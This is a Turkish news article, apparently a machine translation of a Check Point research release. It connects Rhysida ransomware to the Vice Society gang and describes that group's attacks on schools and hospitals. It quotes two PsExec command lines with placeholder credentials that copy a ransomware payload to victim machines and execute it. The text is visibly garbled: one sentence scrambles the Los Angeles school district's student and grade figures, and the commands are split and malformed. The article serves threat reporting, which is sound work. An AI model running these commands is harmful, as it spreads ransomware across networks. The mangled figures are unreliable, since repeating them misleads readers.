Rhysida fidye yazılımının taktikleri ve teknikleri, kötü şöhretli Vice Society fidye yazılımı çetesinin taktiklerine ve tekniklerine benzer. Uzmanlar, Vice Society'nin kendi fidye yazılımı türünü kullandığından şüpheleniyor.
Check Point® Yazılım Teknolojileri Ltd.'nin Tehdit İstihbaratı Departmanından güvenlik araştırmacıları. (NASDAQ: CHKP) kötü amaçlı yazılımı kötü şöhretli bir fidye yazılımı çetesine bağladı. Check Point'in Olay Müdahale Ekibi'nin bildirdiği gibi prosedürler birçok açıdan aynı. Bu, Vice Society'nin yeni fidye yazılımını özel olarak kullandığı anlamına gelmiyor; muhtemelen esas olarak bu fidye yazılımını kullanıyor.
Sağlık ve eğitime yönelik saldırılar
Vice Society, 2021 yılından bu yana öncelikle eğitim ve sağlık sektörlerini hedef alan en saldırgan fidye yazılımı çetelerinden biri oldu. ABD'nin Los Angeles kentinde, ABD'de türünün ikinci en büyüğü olan ve anaokulundan 640.000. sınıfa (lise) kadar 12'den fazla öğrenciyi barındıran Birleşik Okul Bölgesi'ne başarıyla saldırdı. 900'ün üzerinde okul ve 190 bağımsız devlet okulu (sözleşmeli okul) bulunmaktadır. Vice Society'nin bazen fidye yazılımı yükünü değiştirdiği biliniyor, bu da şu anda Rhysida'yı kullandığını gösteriyor.
Rhysida fidye yazılımının yetenekleri şunları içerir:
Uzak Masaüstü Protokolü: İzinsiz giriş sırasında bilgisayar korsanları RDP bağlantılarını başlattı ve ilgili günlükleri ve kayıt defteri girişlerini kaldırmak için adımlar atarak tespit ve analizi zorlaştırdı. RDP, BT ortamında yanal hareket gerçekleştirmek için etkili bir yaklaşım olmaya devam ediyor.
Uzaktan PowerShell Oturumları (WinRM): Tehdit aktörünün RDP aracılığıyla uzaktan bağlanırken ortamdaki sunuculara uzaktan PowerShell bağlantıları başlattığı gözlemlendi. Bu, fidye yazılımı yükünün dağıtılmasından önceki günlerde gerçekleşti.
PsExec: Fidye yazılımı yükünün kendisi, BT ortamındaki bir sunucudan PsExec kullanılarak dağıtıldı. Dağıtım iki aşamada gerçekleşti.
Kötü amaçlı veriyi PsExec.exe -d komutunu kullanarak kopyalama
\\VICTIM_MACHINE -u "ETKİ ALANI\YÖNETİCİ" -p "Şifre" -s cmd /c KOPYALA "\\ransomware_yolu\payload.exe" "C:\windows\temp"
Kötü amaçlı veriyi PsExec.exe -d komutunu kullanarak çalıştırma
\\VICTIM_MACHINE -u "ETKİ ALANI\YÖNETİCİ"" -p "Şifre" -s cmd /cc:\windows\temp\payload.exe.
Mayıs 2023'ten bu yana Rhysida fidye yazılımı saldırıları
Rhysida fidye yazılımı Mayıs 2023'te keşfedildi ve o zamandan beri Şili ordusuna yönelik saldırı gibi çeşitli etkili saldırılardan sorumlu tutuldu. Amerika Birleşik Devletleri'nde (ABD) Prospect Medical Holdings'e yönelik 17 hastane ve 166 kliniği etkileyen saldırının arkasında olduğu iddia ediliyor. ABD Sağlık ve İnsani Hizmetler Bakanlığı daha sonra Rhysida fidye yazılımını sağlık hizmetleri için “önemli bir tehdit” olarak ilan etti.
CheckPoint.com'da daha fazlası
kontrol noktası hakkında Check Point Software Technologies GmbH (www.checkpoint.com/de), dünya çapında kamu idareleri ve şirketler için lider bir siber güvenlik çözümleri sağlayıcısıdır. Çözümler, sektör lideri kötü amaçlı yazılım, fidye yazılımı ve diğer saldırı türlerini algılama oranıyla müşterileri siber saldırılardan koruyor. Check Point, kurumsal bilgileri bulut, ağ ve mobil cihazlarda koruyan çok katmanlı bir güvenlik mimarisi ve en kapsamlı ve sezgisel "tek kontrol noktası" güvenlik yönetim sistemi sunar. Check Point, her ölçekten 100.000'den fazla işletmeyi korur.